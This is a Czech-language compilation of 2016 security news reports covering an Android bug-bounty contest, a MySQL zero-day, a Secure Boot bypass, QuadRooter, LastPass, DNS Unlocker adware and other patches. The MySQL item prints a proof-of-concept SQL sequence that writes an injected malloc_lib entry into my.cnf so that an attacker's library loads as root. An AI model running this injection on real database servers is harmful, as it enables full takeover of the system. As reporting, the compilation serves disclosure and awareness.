V minulém týdnu odstartovala soutěž zvaná Project Zero. V ní mohou změřit síly hackeři z celého světa, kteří se specializují na operační systém Android. Za nalezení chyb v této platformě totiž mohou získat v přepočtu několik miliónů korun. Upozornil na to server Tech Crunch.
Soutěž se týká výhradně chytrých telefonů Nexus 6P a Nexus 5X, na kterých běží čistá verze operačního sytému Android. Právě v tom je soutěž pro jednotlivé účastníky složitější, nemohou totiž využít trhlin v programech třetích stran, aby se do přístrojů snadno dostali.

Podle pravidel musí hackeři objevit kritickou bezpečnostní chybu, kterou bude možné zneužít na dálku. V praxi to tedy znamená, že musejí být schopni proniknout do přístroje například pomocí textové zprávy nebo e-mailu, a následně v něm spustit libovolný škodlivý kód.

Útočníci mohou znát pouze telefonní čísla a e-mailové adresy uživatelů.
Natalie Silvanovichová, organizátorka soutěže
„Cílem této soutěže je najít zranitelnosti a chyby, které umožňují vzdálené spuštění kódu na zařízeních se systémem Android. Útočníci v tomto případě mohou znát pouze telefonní čísla a e-mailové adresy uživatelů,“ prohlásila Natalie Silvanovichová, která má celou soutěž na starosti.

Kdo takový způsob objeví jako první, získá odměnu 200 000 dolarů, tedy v přepočtu více než 4,8 miliónu korun. Druhý úspěšný řešitel se pak může těšit na pomyslný honorář ve výši 100 000 dolarů (2,4 miliónu korun). Třetí v pořadí pak získá 50 000 dolarů, tedy více než 1,2 miliónu korun.

Zmiňované částky skutečně platí pro objevení jedné jediné chyby. Honorář za práci úspěšného lovce chyb je tak doslova pohádkový.

Velké firmy lákají také na odměny
Lákat na podobné odměny se snaží hackery i řada dalších společností. Stejnou strategii již například několik let razí společnosti Facebook a Microsoft. Letos začala odměňovat lovce chyb také společnost Apple, i u ní si hackeři mohou vydělat klidně několik miliónů korun.

Odměny u Applu jsou odstupňované podle závažnosti a podle toho, jakého operačního systému se týkají. Hledat trhliny totiž hackeři mohou například v mobilní platformě iOS, ale stejně tak v operačním systému Mac OS X.

Americký počítačový gigant slibuje odměny ve výši až 200 tisíc dolarů v případě těch nejkritičtějších chyb, které budou vystavovat velké množství uživatelů útokům. V přepočtu na koruny si tak bezpečnostní experti budou schopni vydělat bezmála pět miliónů korun za odhalení jedné jediné chyby.

Zero day pro MySQL

19.9.2016 Root.cz Zranitelnosti
Dawid Golunski objevil dvě kritické chyby v MySQL (a jeho klonech: MariaDB, PerconaDB) umožňující změnu konfiguračního souboru a tím vzdálené spuštění kódu a eskalaci oprávnění. Postižené jsou verze <= 5.7.14, 5.6.32, 5.5.51 a Dawid informoval projekty o zranitelnostech již 29. července. CVE-2016–6662 umožňuje vzdálenou změnu konfigurace MySQL (my.cnf). K tomu vám stačí oprávněný účet, nebo využití SQL Injection chyby webové aplikace používající postiženou verzi MySQL. Využitím této chyby je možné spustit vlastní kód s oprávněním roota. Před zneužitím chyby vás neochrání ani standardní politiky SELinux, či AppArmor.

Každá instalace MySQL obsahuje mysqld_safe script sloužící pro inicializaci databáze a aktivaci základních bezpečnostních prvků. Tento script ale obsahuje SUID (Set owner User ID up on execution) bit a kdokoliv script spustí, tak běží s oprávněním roota. To není nic neobvyklého, ale je dobrým zvykem držet počet takových programů na naprostém minimu. Sami si to můžete ověřit na vlastním systému a odebrat SUID/SGID s root oprávněním kde je to jen možné.

find / ! $ -wholename '/proc/*' -prune $ -perm -u=s -o -perm -g=s ! -type d
Script dále obsahuje parametr umožňující načíst knihovnu před spuštěním MySQL daemona a to je ta kritická část, protože pak tato knihovna bude spuštěna s oprávněním roota při dalším restartu databáze/systému. Cílem je spuštění mysqld_safe s parametrem –malloc-lib nebo změnit jeden z konfiguračních souborů a přidat parametr malloc_lib s cestou ke knihovně útočníka. Pokud tedy útočník bude mít dostatečné oprávnění (FILE) v MySQL prostředí a bude schopen vložit do systému vlastní kód, tak mu tato chyba umožní plně ovládnout celý systém. První omezení oprávnění by měla řešit druhá chyba (CVE-2016–6663), která se týká zmíněné eskalace oprávnění. Detaily nejsou známy, ale Dawid by je měl (včetně PoC kódu) zveřejnit během několika dnů.

Jeden z příkladů změny konfiguračního souboru:

mysql> set global general_log_file = '/var/lib/mysql/my.cnf';
mysql> set global general_log = on;
mysql> select '
'>
'> ; injected config entry
'>
'> [mysqld]
'> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so
'>
'> [separator]
'>
'> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;
Podobná chyba se objevila již v roce 2003 a tento vektor útoku od té doby neměl být možný, avšak Dawid svým PoC kódem dokázal, že tato zranitelnost stále existuje. Především na sdíleném webhostingu je pravděpodobnost zneužití a ovládnutí celých serverů velmi vysoká.

MariaDB a PerconaDB již vydali opravu, Oracle (MySQL) však stále ne (očekává se až 18. října). Dawid doporučuje jako dočasnou ochranu změnit vlastníka konfiguračních souborů MySQL na roota a vytvořit prázdné my.cnf konfigurační soubory ve všech cestách kde je MySQL očekává při startu. Vzhledem ke kompatibilitě klonů s MySQL, jednoduché migraci, použití nejmodernějších technologií, rychlejšímu vydávání oprav, otevřenosti a mnohem vyššímu výkonu (např. XtraDB, Galera) možná bude nejlepším doporučením přejít z MySQL na Mariu, či Perconu.

Chyba ohrožuje stovky miliónů uživatelů Windows. Oprava je v nedohlednu

11.8.2016 Novinky/Bezpečnost Zranitelnosti
Poslední generace Windows zavedly úplně nový způsob spouštění samotného operačního systému. Díky tomu by se měla minimalizovat šance, že se během spouštění uhnízdí na pevném disku nějaké viry. Jak se ale nyní ukázalo, tento standard má kritickou bezpečnostní chybu, kterou mohou zneužít počítačoví piráti. V ohrožení jsou stovky miliónů uživatelů.
Jak funguje UEFI a Secure Boot?

Drtivá většina moderních počítů používá UEFI. To se stalo běžně používaným standardem už v době operačního systému Windows 7, samozřejmostí je tedy pochopitelně i v novější verzích operačního systému od Microsoftu.
Výrobci začali na UEFI houfně přecházet, protože tento standard podporoval funkci zvanou Secure Boot. Jak už samotný název napovídá, jejím hlavním úkolem je chránit pevný disk před nezvanými návštěvníky v době, kdy samotný počítač startuje.
Tedy ve chvíli, kdy uložená data ještě nechrání antivirový program. Ten se totiž spouští až po startu samotného systému. V minulosti se totiž objevilo hned několik škodlivých kódů, které dokázaly útočit ještě před startem počítače, viry se jednoduše uhnízdily v zavaděči systému.
Objevená chyba se týká tzv. jednotného rozšiřitelného firmwarového rozhraní (UEFI), které využívá drtivá většina moderních počítačů a notebooků.

Trhlina dává – zjednodušeně řečeno – útočníkům absolutní kontrolu nad spouštěním operačního systému.

Co to znamená v praxi? Ať má uživatel zabezpečen počítač sebelepším antivirovým programem, útočník do něj může kvůli chybě propašovat škodlivý kód ještě před startem operačního systému.

Může totiž prostřednictvím trhliny ovládnout celý spouštěcí proces a jednoduše mu nařídit, aby bezpečnostní kontrolu ignoroval. Účinná obrana proti případnému útoku tak v podstatě nexistuje.

Je to stejné, jako kdyby měli zloději klíče od bytu a jednoduše si odemkli.
S trochou nadsázky se dá říci, že je to stejné, jako kdyby měli zloději klíče od bytu a jednoduše si odemkli. Úplně stejně totiž tímto „klíčem“ dokážou obejít tzv. Secure Boot a propašovat virus na pevný disk. Pokud se nezvaný návštěvník uhnízdí právě v zavaděči, je jeho odstranění velmi složité.

„Zranitelnost UEFI Secure bootu u zařízení s Windows umožňuje hackerům spuštění bootkitů/rootkitů na zařízeních s tímto operačním systémem,“ vysvětlil technickou stránku věci bezpečnostní analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT.CZ.

Na trhlinu upozornili bezpečnostní experti, kteří vystupují na internetu pod přezdívkami My123 a Slipstrea. Ti zjistili, že celý systém je podobným způsobem napadnutelný přinejmenším několik posledních měsíců.

Microsoft problém řeší
My123 a Slipstream amerického softwarového giganta na toto obří riziko, které se týká stovek miliónů uživatelů po celém světě, upozornili již na jaře. „Microsoft se sice pokouší tuto chybu opravit, avšak doposud ne zcela úspěšně,“ konstatoval Bašta.

Některé hlasy zahraničních expertů navíc naznačují, že 100% oprava prakticky není možná. Po důkladnějším zkoumání to tvrdí dokonce i My123 a Slipstream.

„Bezpečnostní analytici se domnívají, že tento bezpečnostní problém nemůže být zcela eliminován,“ uzavřel Bašta.

Zástupci amerického softwarového gigantu se zatím oficiálně k možnému ohrožení uživatelů nevyjádřili.

Secure Boot má chránit Windows před viry. Kvůli chybě ale otevře zadní vrátka útočníkům
11.8.2016 Živě Zranitelnosti

S příchodem nových verzí Windows a UEFI, které postupně vystřídalo starý BIOS na zánovních počítačích, je start operačního systému mnohem bezpečnější, protože se o něj stará systém Secure Boot, který kontroluje, jestli je vše digitálně podepsané – jak samotný operační systém, tak všechny fáze startu.

Principem Secure Bootu je ochrana před malwarem, který by se chtěl usadit přímo v oblasti zavaděče a načítat viry ve chvíli, kdy je operační systém poměrně bezbranný.

225542173
Startování Windows 10

Bezpečnostní specialisté My123 a Slipstream se však nyní pochlubili (via The Register) se zjištěním, podle kterého byl celý systém nejméně posledních několik měsíců kriticky děravý – chyba pravděpodobně vznikla během vývoje čerstvého Anniversary Updatu.

Oč jde? Aby mohli v Redmondu na desítkách a stovkách modelů notebooků testovat Windows co možná nejflexibilněji, mohou systému Secure Boot přikázat, aby kontrolu startu OS jednoduše ignoroval. Slouží k tomu speciální politika, která se aktivuje hned na začátku celého procesu, takže vývojář poté může spustit jakýkoliv kód i operační systém a zavaděč si bude myslet, že je vše v pořádku.

Pokud by se tato politika dostala do nesprávných rukou, případný útočník by ji mohl použít pro svůj malware, který by poté infikoval počítač na úplném startu OS, kdy je prakticky bezbranný. Nový rootkit/bootkit by rázem mohl ovládnout celá Windows.

A přesně toto se během jara opravdu stalo, dvojice specialistů totiž objevila speciální božskou politiku i v sestaveních Windows, která se dostala k běžným smrtelníkům. Poté informovali Microsoft, který však údajně problém zpočátku ignoroval. Teprve poté, co připravili funkční test zneužití, začali v Redmondu problém řešit a postupně připravili několik záplat Windows, které se v posledních týdnech skutečně nainstalovaly a díru částečně řeší.

647469329
Proof-of-concept s aktivátorem politiky, která zablokuje kontroly v Secure Bootu

Podle My123 a Slipstreama jsou však opravy zatím nedostatečné a Microsoft bude muset ještě zapracovat.

Případ zároveň ukazuje na principiální bezpečnostní chybu, kdy se může celý bezpečnostní systém zhroutit jako domeček z karet, pokud existuje nějaký master klíč, který vše odemkne – v tomto případě ona politika, která vypne veškeré kontroly během startu Windows.

Přesně po takovém „božském klíči“ přitom touží třeba všemožné státní instituce, americká FBI a další, kteří se dušují, potřebují kvůli odhalování trestných činů a teroristických hrozeb tu odemknout zašifrovaný iPhone, tu nahlédnout do šifrované komunikace na WhatsAppu a tak dále. Pokud by jim nějakým master heslem výrobci skutečně vyšli vstříc, riziko vzniku podobné bezpečnostní díry jako v případě Secure Bootu vzroste doslova exponenciálně.

Další zranitelnosti v Androidu, Qualcomm přispěchal s opravami

10.8.2016 Zdroj: SecurityWorld Zranitelnosti
Miliony zařízení s čipovými sadami od firmy Qualcomm, na kterých zároveň běží Android, jsou vystaveny minimálně jedné z čtyř kritických zranitelností. Ty umožní aplikacím i bez patřičných oprávnění převzít nad přístrojem kontrolu.

Všechny čtyři chyby odhalil bezpečnostní analytik Adam Donenfeld z Check Point Software Technologies; nález oznámil v neděli na hackerské konferenci DEF CON v Las Vegas. Qualcommu byly oznámeny již během února a dubna, výrobce na to zareagoval patřičnými opravami, poté, co zranitelnosti shledal vysoce rizikovými.

Bohužel to neznamená, že jsou všechna zařízení chráněna. Z důvodu velké roztříštěnosti ekosystému Androidu běží mnoho mobilů a tabletů na starších verzích operačního systému a již nedostávají aktualizace firmwaru, nebo je získávají až s několikaměsíčním zpožděním. Takovým zařízením pak nebezpečí stále hrozí.

Dokonce ani Google, který vydává bezpečnostní záplaty pro svou Nexus řadu chytrých telefonů a tabletů každý měsíc, ještě neopravil všechny chyby.

Zranitelnostem se jako celku říká QuadRooter, protože při zneužití dávají útočníkovi root pravomoce – tedy nejvyšší možné pravomoce na Linuxu založených systémech, mezi které Android patří. Individuálně se zranitelnosti označují jako CVE-2016-2059, CVE-2016-2503, CVE-2016-2504 a CVE-2016-5340. Nachází se v různých ovladačích, jež Qualcomm dodává výrobcům zařízení.

Během dubna a července Qualcomm vydal aktualizace, které tyto chyby opravují, tvrdí v e-mailu Alex Gantman, viceprezident strojírenské sekce Qualcomm Product Security Initiative.

Google zatím pro svá Nexus zařízení opravil jen tři ze čtyř chyb; vlastní opravy předem sdílí s výrobci a také je publikuje na Android Open Source Project (AOSP), dostanou se k nim tedy téměř všichni.

Zařízení běžící na Androidu 6.0 a více (Marshmallow buildy) s aktualizacemi z 5. května by již měli být chráněny proti všem zranitelnostem s výjimkou CVE-2016-5340. Androidy s oblíbenou verzí 4.4.4 (KitKat) či 5.0.2 a 5.1.1 (Lollipop) s aktualizacemi z 5. května jsou prozatím chráněny jen před dvěmi objevenými chybami, a to CVE-2016-2503 a CVE-2016-2504. V jejich případě je CVE-2016-2059 zneužitelný, Google jej však označil jen jako mírně nebezpečný, vzhledem k existující ochraně systému.

Čtvrtá zranitelnost, CVE-2016-5340, zůstává Googlem neopravena úplně. Výrobci by však mohli získat záplatu přímo od Qualcommu, skrze jeho open-source projekt Code Aurora.

„Této chybě se budeme věnovat v našem nadcházejícím bezpečnostním bulletinu. Partneři Androidu však mohou reagovat rychleji a využít možností veřejné opravy, jíž Qualcomm poskytl,“ popsal mluvčí Googlu skrze e-mail. Zneužití kterékoli z těchto čtyř zranitelností by uživatele vystavilo stažení infikovaných aplikací, řekl dále k věci Google.

„Naše Verify App a SafetyNet ochrany pomáhají identifikovat, zablokovat a odstranit aplikace, které takovéto zranitelnosti zneužívají,“ dodal mluvčí.

Je pravda, že ohrozit přístroje těmito chybami je možné jen skrze závadné aplikace. Přímé způsoby útoku jako prohlížení webu, přiložené soubory v e-mailu nebo SMS v tomto případě nelze aplikovat. Aplikace však dle tvrzení Check Pointu nepotřebují žádná zvýšená oprávnění, což jejich nebezpečí výrazně zvyšuje.

Výzkumníci Check Pointu a Google se mezitím neshodli na nebezpečnosti zranitelnosti CVE-2016-2059. Zatímco Qualcomm ji společně se zbytkem chyb označil jako vysoce rizikovou, Google ji posuzuje jen jako mírně nebezpečnou, neboť podle vyjádření firmy lze rizika zmírnit pomocí nástavby SELinux.

SELinux je rozšíření jádra, které činí zneužití některých chyb výrazně složitější pomocí vynucování přístupu. Mechanismus byl využíván k vynucení sandboxových hranic aplikacím již od verze 4.3 (Jelly Bean).

Check Point ovšem s postojem Googlu nesouhlasí. Během Donenfeldova projevu na DEF CONu ukázal, jak CVE-2016-2059 dokáže „přecvaknout“ SELinux z vynucovacího do liberálního módu, čímž efektivně vyřadí jeho ochranu.

Je těžké identifikovat, která konkrétní zařízení jsou zranitelná, neboť někteří výrobci mohou s aktualizacemi čekat na Google, zatímco jiní již mohli opravu převzít přímo od Qualcommu. Aby si uživatelé sami mohli svůj přístroj otestovat, vydal Check Point aplikaci zdarma zvanou QuadRoot Scanner, dostupnou z obchodu Google Play. Ta uživatelům umožní svá zařízení na tyto čtyři zneužití otestovat.

Nová chyba Qualcommu ukazuje naplno bezpečnostní problém Androidu
8.82016 Zdroj: Živě Zranitelnosti
Proběhla bezpečnostní konference Def Con a na světě je rázem několik nově oznámených bezpečnostních problémů. Pro mobilní telefony s Androidem to jsou čtyři bezpečnostní chyby.

Problém je konkrétně v ovladačích Qualcommu, které do mobilního telefonu instaluje výrobce. Tři ze čtyř chyb již mají dostupné opravy a čtvrtá bude brzy následovat. Chyba umožňuje bez upozornění systémem získat větší práva na Androidu 6 a dřívějším. V lepším případě to pomůže k dobrovolnému rootu telefonu, v tom horším získá podvodná aplikace kompletní přístup k vašim datům a nic se nedozvíte.

Když uvidíte obrázek vlevo, máte problém. Pravý uvidíte s procesory Mediatek, Kirin, Exynos a dalšími

V současnosti jsou opravené akorát telefony Nexus 5X, 6 a 6P. Ostatní stále čekají na opravu od výrobce. Každý telefon s procesorem Snapdragon potřebuje opravu. Zda jste postižení, můžete zkontrolovat nástrojem QuadRooter Scanner od tvůrce antivirů Check Point Software.

Bezpečnostní aktualizace pro telefony ale vydává jen velmi málo výrobců. Google se to snaží sice zjednodušit oddělením záplat od větších aktualizací systému, vždy je ale nutná aktivita ze strany výrobce mobilního telefonu. Pokud pro něj zájem o bezpečnost uživatelů končí v okamžiku prodeje telefonu, hrozí tu milióny telefonů se známými, dobře zdokumentovanými, ale neopravenými chybami.

Pokud bude váš telefon zranitelný, měli byste se vyvarovat instalacím aplikací z neznámých zdrojů. Paradoxně může pomoci root telefonu. Pak bude mít uživatel opravdu kompletní kontrolu nad telefonem. Pro neznalého uživatele je ale pochopitelně případný root telefonu spojený s mnoha dalšími bezpečnostními riziky.

LastPass měl (opět) problém, útočníci mohli získávat hesla uživatelů

1.8.2016 Zdroj: Lupa.cz Zranitelnosti
Nepříjemná bezpečnostní chyba v prohlížečových rozšířeních pro LastPass umožňovala útočníkům získávat uložená hesla.
Tavis Ormandy, člen týmu u Googlu, který se věnuje vyhledávání chyb, minulý týden zjistil, že LastPass pro Firefox je možné zmást natolik, že vydá hesla pro určitou službu, aniž by uživatel na této službě aktuálně byl. Stačilo k tomu dostat uživatele na připravené webové stránky a požádat LastPass o automatické vyplnění hesla.

Detaily Ormandyho zjištění už jsou známy a dle očekávání jde o zneužití toho, jakým způsobem se LastPass vsunuje do stránek (hlavně do vstupních prvků). Podstatné na nové chybě je, že velmi podobná chyba byla objevena již před rokem a týkala se rozšíření pro Chrome (a byla také již před rokem napravena).

LastPass v LastPass Security Updates uvádí, že opravena byla i čerstvě objevená chyba, a pokud používáte LastPass 4.0+, tak by už problém neměl existovat. Případná ruční instalace opravené verze je možná z lastpass.com/lastpassffx

Připomeňme, že LastPass měl v minulosti už více bezpečnostních problémů (viz například LastPass byl děravý, v případě pochybností si raději změňte heslo), včetně úniku dat (Správce hesel LastPass hlásí únik z databáze, změňte si heslo). Konkurenční správci hesel na tom nebyli o moc lépe.

Jedna z dobrých možností, jak se dalo zabránit zneužití v tomto případě, by bylo vypnutí automatického vyplňování hesel – mírná komplikace pro uživatele, který by zadávání hesel z LastPass musel vyvolávat přes menu. Vedle toho stále platí, že pro důležité služby byste vždy měli používat dvoufaktorové ověření přihlášení.

Nová chyba ve Windows vás zahltí nechtěnou reklamou

27.7.2016 Zdroj: SecurityWorld Zranitelnosti
Nová verze malwaru DNS Unlocker umožňuje měnit výchozí konfiguraci DNS, díky čemuž může zasažené uživatele začít zásobovat nadměrnou reklamou.
Analytici Esetu detekovali novou verzi adwaru DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomwarem – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert v Esetu.

Analytici zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti.

„V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ tvrdí Šnajdr.

Základní problém prý spočívá v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto Eset zaslal Microsoftu, který podle jeho slov uznal, že jde chybu, ale bohužel ji neklasifikoval jako potenciální zranitelnost.

"Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci Microsoftu.

Možná preventivních opatření podle Esetu:

Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí některých on-line skenerů lze také malware DNS Unlocker odstranit.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.

Neopravená chyba ve WordPress pluginu ohrožuje tisíce webů

27.7.2016 Zdroj: SecurityWorld Zranitelnosti
Vada v zásuvném modulu Mobile Detector v oblíbeném systému pro správu obsahu umožnil hackerům nahrát škodlivá data na servery.
Během posledního týdne se útočníkům podařilo zneužít chybu, která se objevila v oblíbeném WP Mobile Detector pluginu, instalovaném na více než 10 tisíc webových stránkách.

Vývojář zásuvného modulu chybu opravil již v úterý ve verzi 3.6; uživatelé by se tak měli ujistit nejen, že mají nejnovější verzi pluginu, ale také, zda nejsou jejich stránky již napadeny.

Zneužití je možné díky skriptu zvaném resize.php a umožňuje vzdáleným útočníkům nahrávat soubory na webový server. Mezi takové soubory mohou patřit např. backdoor shell skripty, které hackerům poskytnou zadní vrátka přístupu na server a umožní jim vkládat části kódu na webové stránky.

Chybu objevil bezpečnostní systém Wordpressu PluginVulnerabilities.com poté, co sledoval requesty na soubor wp-content/plugins/wp-mobile-detector/resize.php, ačkoli ten na serveru neexistoval. To znamená, že někdo používal automatický sken, aby vyhledal tento konkrétní soubor, což obvykle bývá právě z důvodu možné zneužitelné chyby.

Výzkumníci z bezpečnostní agentury Sucuri, specializované na webové zabezpečení, analyzovali logy z firewallu společnosti a nalezli několik pokusů o zneužití chyby, začínaje 27. květnem; tedy čtyři dny před vydáním opravné aktualizace. Je však možné, že útočníci o vadě věděli již dříve.

WP Mobile Detector (pozor na záměnu s jiným, nenakaženým pluginem jménem WP Mobile Detect) měl na počátku května přes 10 tisíc aktivních instalací. Nyní se toto číslo smrsklo na pouhou pětinu, ale z části je to i proto, že po detekci chyby WordPress zásuvný modul na čas odstranil.

Aby útočníci mohli vadu v resize.php zneužít, musí server mít povolenu funkci allow_url_fopen. To do jisté míry limituje nebezpečnost závady.

Protože není jasné, kolik webových stránek bylo nakaženo, je dobrý nápad, jste-li uživatelem dané aplikace, zkontrolovat svůj server.

„Valná většina zranitelných stránek je nyní infikována spamem skrze doorway weby, odkazujících obvykle na pornostránky,” popisuje výzkumník ze Sucuri Douglas Santos. „Standardně najdete složku gopni3g v kořenovém adresáři, která obsahuje soubor story.php (která doorwaye umožňuje), .htaccess a podsložky se spam soubory a šablonami.”

Chrome má desítky bezpečnostních chyb. Některé jsou velmi vážné

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
V oblíbeném webovém prohlížeči Chrome bylo objeveno bezmála pět desítek bezpečnostních chyb. Nová verze tohoto browseru však veškeré trhliny opravuje. S instalací aktualizace by tak uživatelé neměli otálet.
Nová verze Chromu s pořadovým číslem 52 opravuje celkem 48 zranitelností. Z nich 11 je přitom označeno nálepkou „vysoce závažné“.

Důležité aktualizace zlepšují funkčnost
Zbylé tři desítky aktualizací slouží především ke zlepšení funkčnosti jednotlivých součástí internetového prohlížeče. Tyto důležité záplaty by nicméně neměly pro uživatele představovat žádné velké bezpečnostní riziko.

Stahovat nejnovější Chrome 52 je možné prostřednictvím automatických aktualizací.

V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřena zadní vrátka do svých počítačů.

Bezpečnostní programy mají kritické chyby, které mohou zneužít kyberzločinci

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
Počítačoví experti uživatelům neustále kladou na srdce, jak důležité je používat antivirové programy a další bezpečnostní nástroje. Ani takovým aplikacím se ale nevyhýbají chyby, které mohou být nakonec zneužity počítačovými piráty. Na vlastní kůži se o tom přesvědčili vývojáři společnosti Symantec.
Ve více než dvou desítkách programů této společnosti, které měly uživatele chránit před nebezpečnými viry a počítačovými piráty, byly nalezeny nebezpečné trhliny. Ty obsahovaly produkty Symantec i Norton.

Konkrétně zranitelnosti byly objeveny v programech Norton Security, Norton 360, Symantec Endpoint Protection, Symantec Email Security, Symantec Protection Engine a řadě dalších. Problém se přitom netýká pouze operačního systému Windows, ale i dalších platforem.

Propašovat mohli libovolný virus
Chyby mohli kyberzločinci zneužít k propašování prakticky libovolného škodlivého kódu na cizí počítače. Bez jakýchkoliv sofistikovaných technik tak na napadených strojích mohli odposlouchávat uživatele, případně přistupovat k jejich datům.

„Objevené zranitelnosti jsou tak špatné, jak jen to jde. Piráti se mohli dostat na cizí počítače bez jakékoliv interakce uživatele,“ přiblížil riziko nebezpečných trhlin bezpečnostní expert Pierluigi Paganini na serveru Security Affairs.

Společnost Symantec naštěstí vydala pro objevené trhliny aktualizace. S ohledem na možná rizika by s jejich instalací uživatelé neměli otálet.

Internet Explorer i Windows mají kritické bezpečnostní chyby

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
Společnost Microsoft v úterý vydala pravidelný balík záplat pro chyby ve svých produktech. Kritické zranitelnosti byly odhaleny v operačním systému Windows, kancelářském balíku Office a webových prohlížečích Internet Explorer a Edge.
Kritické chyby mohou počítačoví piráti zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Pro kritické zranitelnosti bylo vydáno celkem pět bezpečnostních záplat. Pro všechny objevené chyby jsou již k dispozici záplaty. Microsoft je vydal v rámci pravidelných aktualizací, které vycházejí vždy druhé úterý v měsíci.

11 důležitých updatů
Zbylých 11 updatů, které vyšly společně s balíkem pravidelných aktualizací, zástupci amerického softwarového gigantu označují jako důležité.

Ty slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Důležité záplaty by neměly pro uživatele představovat žádné velké bezpečnostní riziko.

S aktualizacemi neotálet
Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Hackeři našli v síti Pentagonu 138 bezpečnostních děr

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
Velmi netradičním způsobem se americké ministerstvo obrany rozhodlo otestovat bezpečnost své sítě a dalších počítačových systémů. Uspořádalo soutěž, ve které se hackeři mohli předhánět, kdo najde více bezpečnostních trhlin. A málo jich rozhodně nebylo…
Hledat chyby v sítích Pentagonu mohli hackeři beztrestně jeden celý měsíc. Do unikátního programu se přihlásilo více než 1400 technologických nadšenců, kteří za pouhých třicet dní odhalili celkem 138 závažných bezpečnostních děr.

Ty nebyly žádným způsobem zneužity. Díky tomu, že na ně hackeři upozornili, mohli je bezpečnostní experti amerického ministerstva obrany opravit.

Nejúspěšnější hacker získal statisíce
O výsledcích hackerského klání informoval na konci minulého týdne americký ministr obrany Ashton Carter s tím, že nejúspěšnější hledač bezpečnostních chyb obdržel odměnu ve výši 25 000 dolarů, tedy bezmála 600 tisíc korun.

Celkově měl Pentagon na odměny pro hackery vyčleněno 75 000 dolarů 1,8 miliónu korun.

Carter se netajil tím, že ministerstvo na podobné soutěži velmi vydělalo. Kdyby si totiž najalo nějakou specializovanou firmu na hledání bezpečnostních trhlin, odměny by se pohybovaly v řádech miliónů dolarů.

Zároveň zdůraznil, že se Pentagonu touto netradiční soutěží podařilo navázat kontakt s „inovativními“ lidmi, kteří evidentně mají zájem pomáhat s obranou své vlasti. Nevyloučil, že v podobných kláních bude americké ministerstvo obrany pokračovat i nadále.

ESET objevil chybu v systému Windows, která komplikuje ochranu před DNS útoky

27.7.2016 Zdroj: Eset Zranitelnosti

Analytici společnosti ESET detekovali novou verzi adware DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomware – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert společnosti ESET.

Analytici společnosti ESET zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti. „V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ konstatuje Petr Šnajdr.

Odborníci ze společnosti ESET analyzovali tento podvod a zjistili, že základní problém je v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto zaslali společnosti Microsoft. Její bezpečnostní divize Microsoft Security Response Center (MSRC) uznala, že jde chybu, ale bohužel ji neklasifikovala jako potenciální zranitelnost. „Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci divize.

„Doufejme, že Microsoft bude tento problém řešit v budoucích verzích operačního systému Windows. Do té doby by si měli být uživatelé vědomi rizika DNS útoků,“ říká Marc-Etienne Leveille, výzkumník malware ve společnosti ESET, který se podílel na odhalení této bezpečnostní chyby.

Experti společnosti ESET zároveň zveřejnili řadu preventivních opatření:

Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
